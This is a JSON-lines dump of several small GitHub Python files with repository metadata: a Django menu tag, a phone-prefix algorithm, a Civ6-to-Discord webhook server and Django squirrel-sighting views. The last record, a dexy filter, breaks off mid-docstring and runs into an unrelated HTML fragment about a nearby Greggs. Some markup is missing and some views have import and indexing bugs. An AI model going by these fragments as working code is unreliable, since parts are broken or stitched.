+{"seq_id": "17188000546", "text": "from django import template\nfrom treemenu.models import Category\nfrom typing import List, Dict\nfrom django.shortcuts import get_object_or_404\n\nHREF = '''\n\n \n %s \n \n'''\n\nregister = template.Library()\n\n\ndef get_menu(menu: List[Category], item: Category) -> dict:\n \"\"\"Функция возвращет словарь с узлами и их потомками,\n которые надо вывести на страницы.\"\"\"\n\n if item is None:\n return {'/': menu.filter(parent=None)}\n children = item.get_children()\n menu_dict = get_menu(menu, item.parent)\n menu_dict[item.title] = children\n return menu_dict\n\n\ndef get_html(menu: Dict[str, List[Category]],\n dir: List[Category]) -> str:\n \"\"\"Функция формирует html код для выбранного пункта меню.\"\"\"\n\n html_code = ''\n for node in dir:\n html_code += HREF % (node.title, node.title)\n children = menu.pop(node.title, False)\n if children:\n html_code += get_html(menu, children)\n html_code += ' '\n return html_code\n\n\n@register.simple_tag()\ndef draw_menu(name_menu):\n menu_list = Category.objects.select_related('parent').all()\n if name_menu is None:\n item = name_menu\n else:\n item = get_object_or_404(menu_list, title=name_menu)\n dict_menu = get_menu(menu_list, item)\n roots_dir = dict_menu.pop('/')\n return get_html(dict_menu, roots_dir)\n", "repo_name": "malabr1sta/testapp", "sub_path": "testapp/treemenu/templatetags/treemenutags.py", "file_name": "treemenutags.py", "file_ext": "py", "file_size_in_byte": 1487, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.template.Library", "line_number": 13, "usage_type": "call"}, {"api_name": "django.template", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "treemenu.models.Category", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "treemenu.models.Category", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 29, "usage_type": "name"}, {"api_name": "treemenu.models.Category", "line_number": 29, "usage_type": "name"}, {"api_name": "treemenu.models.Category.objects.select_related", "line_number": 44, "usage_type": "call"}, {"api_name": "treemenu.models.Category.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "treemenu.models.Category", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "2920552428", "text": "from collections import deque\n\ndef landline_list(phone_book):\n \"\"\"\n 시작 시간: 14:46\n 종료 시간: 15:46\n 걸린 시간: 60분\n\n 결과: 정확성 테스트는 통과했으나, 효율성 테스트에서 시간초과 나옴\n 원인: 사용한 알고리즘의 시간복잡도 O(n^2)\n 해결:\n 정수 문자열을 정렬하면, 접두사와 접두사가 붙은 문자열이 앞 뒤로 정렬된다는 것을 이용함\n 앞 뒤 문자열 비교를 위해 deque.rotate() 를 사용해서 앞 뒤 문자열을 비교할 수 있도록 함\n\n 정리:\n 테스트 케이스가 100만개로 시간복잡도 O(n^2) 알고리즘으로 풀면 안된다는 것을 알았지만 다른 풀이가 떠오르지 않음\n 많은 문제를 풀어볼 필요가 있음\n \"\"\"\n answer = True\n\n phone_book = sorted(phone_book)\n rotated_book = deque(phone_book)\n rotated_book.rotate(-1)\n\n for number1, number2 in zip(phone_book, rotated_book):\n if number2.startswith(number1):\n return False\n \n return answer\n\nprint(landline_list([\"119\", \"456\", \"11955\"]))", "repo_name": "jacob3015/playdata-python-algorithm", "sub_path": "src/programmers/landline_list.py", "file_name": "landline_list.py", "file_ext": "py", "file_size_in_byte": 1123, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "collections.deque", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "20538989877", "text": "import asyncio\nimport json\nfrom os import path, getenv\nfrom quart import Quart, request\nfrom .game_tracker import CivGameTracker\nfrom .discord_bot import CivDiscordNotifyBotClient, add_commands_to_bot\n\napp = Quart(__name__)\n\nlocal_path = path.abspath(path.dirname(__file__))\nsample_json_path = path.join(local_path, \"..\", \"sample_games.json\")\nwith open(sample_json_path) as f:\n game_data = json.load(f)\n\ngame_tracker = CivGameTracker.from_dict(game_data)\n\n\n@app.before_serving\nasync def start_discord_client():\n token = getenv(\"CIV6_NOTIFY_DISCORD_TOKEN\")\n loop = asyncio.get_event_loop()\n discord_bot = CivDiscordNotifyBotClient(loop)\n add_commands_to_bot(discord_bot)\n\n game_tracker.discord_client = discord_bot\n loop.create_task(discord_bot.start(token))\n\n\n@app.route(\"/civ6\", methods=[\"POST\"])\nasync def civ_webhook():\n data = json.loads(await request.get_data())\n try:\n game_name = data[\"value1\"]\n player_name = data[\"value2\"]\n turn_count = int(data[\"value3\"])\n except KeyError:\n pass\n\n game_tracker.update_game(game_name, player_name, turn_count)\n return \"success\\n\"\n\n\nif __name__ == \"__main__\":\n app.run()\n", "repo_name": "SpenserHaddad/civ6-discord-notify", "sub_path": "civ6_notify/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "quart.Quart", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "name"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "game_tracker.CivGameTracker.from_dict", "line_number": 15, "usage_type": "call"}, {"api_name": "game_tracker.CivGameTracker", "line_number": 15, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 20, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 21, "usage_type": "call"}, {"api_name": "discord_bot.CivDiscordNotifyBotClient", "line_number": 22, "usage_type": "call"}, {"api_name": "discord_bot.add_commands_to_bot", "line_number": 23, "usage_type": "call"}, {"api_name": "game_tracker.discord_client", "line_number": 25, "usage_type": "attribute"}, {"api_name": "discord_bot.start", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "quart.request.get_data", "line_number": 31, "usage_type": "call"}, {"api_name": "quart.request", "line_number": 31, "usage_type": "name"}, {"api_name": "game_tracker.update_game", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "9083183712", "text": "from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.db.models import Max, Min, Count, Avg\nfrom .models import Sighting\nfrom .forms import SightingForm\nfrom django.views.generic.edit import CreateView, DeleteView\n\n\n\ndef map(request):\n sighting = Sighting.objects.all()[:100]\n context = {'sighting': sighting}\n return render(request, 'track/map.html',context)\n\n\n#unique id\ndef update_sighting(request,unique_squirrel_id):\n squirrel = get_object_or_404(Sighting, unique_squirrel_id=unique_squirrel_id)\n form = SightingForm(request.POST or None, instance=squirrel)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('track:list_sightings'))\n return render(request, 'track/update.html', {'form':form})\n\n\n#add\ndef create_sighting(request):\n squirrel = Sighting()\n if request.method == 'POST':\n form = SightingForm(request.POST)\n if form.is_valid():\n squirrel = form.save()\n return HttpResponseRedirect(reverse('track:list_sightings'))\n else:\n form = SightingForm() \n return render(request, 'track/add.html', {'form': form,'squirrel':squirrel})\n\n\n#stats\ndef obtain_stats(request):\n squirrels = Sighting.objects.all()\n total = len(squirrels)\n avg_hectare_squirrel_num = squirrels.aggregate(Avg('Hectare Squirrel Number')).values()[0] \n num_juve = len(squirrels.filter(age='Juvenile'))\n num_adult = len(squirrels.filter(age='Adult'))\n fur_color = squirrels.values_list('Primary Fur Color').annotate(fur_count=Count('Primary Fur Color')).order_by('-fur_count')\n context = {'total number of squrrels':total,\n 'average number of squirrels per hectare':avg_hectare_squirrel_num,\n 'total number of juvenile':num_juve,\n 'total number of adult':num_adult,\n 'most common fur color':fur_color,\n }\n return render(request, 'track/stats.html', context)\n\n#sightings\ndef list_sightings(request):\n sighting = Sighting.objects.all()\n context = {\n 'sighting': sighting,\n }\n return render(request, 'track/sighting.html', context)\n\ndef index(request):\n return HttpResponse(\"Index Page\")\n", "repo_name": "YifanXia0623/squirrel-project", "sub_path": "track/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2358, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "models.Sighting.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Sighting.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.Sighting", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Sighting", "line_number": 21, "usage_type": "argument"}, {"api_name": "forms.SightingForm", "line_number": 22, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Sighting", "line_number": 31, "usage_type": "call"}, {"api_name": "forms.SightingForm", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 36, "usage_type": "call"}, {"api_name": "forms.SightingForm", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Sighting.objects.all", "line_number": 44, "usage_type": "call"}, {"api_name": "models.Sighting.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.Sighting", "line_number": 44, "usage_type": "name"}, {"api_name": "django.db.models.Avg", "line_number": 46, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 49, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Sighting.objects.all", "line_number": 60, "usage_type": "call"}, {"api_name": "models.Sighting.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.Sighting", "line_number": 60, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 64, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "14775027426", "text": "from bs4 import BeautifulSoup\nfrom dexy.filter import DexyFilter\nimport inflection\nimport re\n\nclass Customize(DexyFilter):\n \"\"\"\n Add \n\n \n\n Your closest greggs is \"\"\"+str(distance)+\"\"\"meters away \n
\n Scan to get google maps directions \n
\n \n\n\n\n